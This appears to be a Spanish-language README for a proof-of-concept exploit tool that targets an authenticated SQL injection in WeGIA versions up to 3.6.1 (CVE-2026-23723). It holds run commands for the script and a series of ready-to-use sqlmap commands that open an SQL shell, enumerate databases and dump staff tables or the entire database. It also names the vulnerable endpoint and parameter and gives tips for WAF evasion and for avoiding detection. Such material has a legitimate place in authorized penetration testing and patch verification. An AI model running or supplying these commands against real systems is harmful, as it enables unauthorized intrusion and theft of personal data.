
Este es un script auxiliar ligero en Python diseñado para automatizar la generación de archivos PoC compatibles con sqlmap para la vulnerabilidad de inyección SQL basada en errores autenticada en WeGIA (≤ 3.6.1), identificada como GHSA-xfmp-2hf9-gfjp.
Inyección SQL Basada en Errores Autenticada en WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Aviso Oficial
Autor Original del PoC / Reportante: ViniCastro2001 GHSA Publicado por: nilsonLazarin (mantenedor del proyecto)
Este script ligero en Python automatiza:
id_memorando=1*)--sql-shell)requests (la mayoría de los entornos de pruebas de penetración ya la tienen)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# Recomendado: solicitud interactiva de contraseña
python CVE-2026-23723.py --url http://target.com -u admin
# Proporcionar la contraseña directamente
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# Archivo de salida personalizado
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
Después de ejecutarse correctamente, el script:
Intentará iniciar sesión Generará wegia_sqlmap.req (o tu nombre de archivo personalizado) Mostrará comandos sqlmap listos para usar
# 1. Shell interactivo tipo MySQL (muy recomendado)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. Mostrar base de datos actual y todas las bases de datos
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. Listar tablas en la base de datos wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. Volcar una tabla específica (ejemplo: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. Volcar toda la base de datos wegia (¡con cuidado!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Opciones opcionales de sqlmap:
--proxy=http://127.0.0.1:8080 (a través de Burp/ZAP)
--tamper=space2comment,randomcase (evasión básica de WAF)
--delay=1 (ralentizar para evitar la detección)
Si el Inicio de Sesión Automático Falla Inicia sesión manualmente a través del navegador → copia la cabecera Cookie completa → ejecuta sqlmap directamente:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
Aviso Legal Este PoC se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. El uso no autorizado contra cualquier sistema es ilegal y está prohibido. El autor y los colaboradores no asumen ninguna responsabilidad por el mal uso o cualquier daño causado. Referencias
GHSA-xfmp-2hf9-gfjp CVE-2026-23723